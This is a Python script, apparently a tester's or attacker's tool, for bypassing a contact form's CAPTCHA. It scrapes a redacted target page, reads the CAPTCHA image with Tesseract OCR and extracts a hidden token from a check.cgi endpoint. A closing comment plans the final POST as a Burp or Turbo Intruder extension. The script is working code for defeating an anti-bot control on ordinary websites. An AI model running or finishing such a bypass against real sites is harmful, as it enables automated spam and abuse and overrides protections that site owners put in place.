import cv2
import pytesseract
from urllib.request import urlopen
import numpy as np
from bs4 import BeautifulSoup
import requests
import urllib.parse
import re
#burninator August 2022
#captcha bypass: by hitting the validation check API directly PLUS using OCR AI library to read the captcha
#contact_check_page = requests.get('')
#testRegexTheCode = '/RECAPTCHACODE/RECAPTCHA.png'
#x = re.findall("[0-9]+",testRegexTheCode)
# Request headers: a desktop Firefox User-Agent string.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0',
}
# STEP ONE - get the recaptcha image text value first, before the .cgi check (order matters!)
# Produces: targetCaptcha (image path from the page), fromRecaptchaUrl (first run
# of digits in that path) and answerToRecaptcha (OCR text read from the image).
#thesoupson = open('TARGET/TARGET.htm', 'r')
thesoupofcontact = requests.get('TARGET/', headers=headers) #also tested and working
thesoupson = thesoupofcontact.text
#for line in thesoupson:
# print (str(line))
soup = BeautifulSoup(thesoupson, "html.parser")
images = soup.find_all('img')

# Find the captcha <img>. .get() avoids a KeyError on <img> tags that have no
# src attribute; if several images match, the last one wins.
targetCaptcha = None
for image in images:
    src = image.get('src', '')
    if 'recaptcha.png' in src:
        print('target captcha ' + src)
        targetCaptcha = src
if targetCaptcha is None:
    raise SystemExit('no recaptcha.png image found in the fetched page')

# The first run of digits in the image path is kept as the captcha code.
recaptchaCodeMatch = re.findall("[0-9]+", targetCaptcha)
if not recaptchaCodeMatch:
    raise SystemExit('no numeric code found in captcha path: ' + targetCaptcha)
fromRecaptchaUrl = recaptchaCodeMatch[0]

pytesseract.pytesseract.tesseract_cmd = r'C:\PROGRA~1\Tesseract-OCR\tesseract.exe' #set env vars here because... MEH!

# Loading image using OpenCV: download the raw bytes, then decode them in memory.
# The with-block closes the HTTP response once the bytes have been read.
with urlopen('https://TARGET' + targetCaptcha) as req:
    arr = np.asarray(bytearray(req.read()), dtype=np.uint8)
img = cv2.imdecode(arr, -1)  # -1 = cv2.IMREAD_UNCHANGED
if img is None:
    # imdecode signals undecodable data by returning None instead of raising.
    raise SystemExit('could not decode captcha image: ' + targetCaptcha)

#cv2.imshow('lalala', img)
# Leftover from the imshow preview above: pressing Esc (key code 27) aborts the script.
# NOTE(review): with imshow disabled there is no window to receive a key - confirm
# this call is still wanted.
if cv2.waitKey() & 0xff == 27:
    raise SystemExit
#img = cv2.imread('recaptcha.png')

# Converting to text
# NOTE(review): the OCR result is used as returned; it may carry trailing
# whitespace - confirm whether it needs stripping before it is submitted.
answerToRecaptcha = pytesseract.image_to_string(img)
print(str("this is the captcha text TEEHEE!" ) + answerToRecaptcha)
#STEP TWO - get the CGI value - usually loaded from Javascript (the original note is cut off here)
# Produces: contactCheckValue, the URL-encoded value of the last <input> that
# has a value attribute in the check.cgi response.
#CGI request is tested and working, tho i just added that cgisouprequestvar:
cgisouprequest = requests.get('https://TARGET/check.cgi')
cgisoup = cgisouprequest.text
#cgisoup = open('TARGET/contact_check.cgi', 'r')
soupses = BeautifulSoup(cgisoup, "html.parser")
inputs = soupses.find_all('input')

# Print every input value; the last one seen is the one that gets encoded.
# Inputs with no value attribute are skipped rather than raising KeyError.
thevalue = None
for field in inputs:  # named 'field' so the builtin input() is not shadowed
    value = field.get('value')
    if value is None:
        continue
    print (str(value))
    thevalue = str(value)
if thevalue is None:
    raise SystemExit('no <input> with a value attribute found in check.cgi response')

# safe="" percent-encodes every reserved character, including '/'.
encodeme = urllib.parse.quote(thevalue, safe="")
contactCheckValue = encodeme
#STEP THREE - build out the POST request with the stuff with the two variables + that same randomized User-Agent string
# also consider building this into either a Burp extension or Turbo Intruder (most likely an extension since it allows calling python modules or other treats from the path)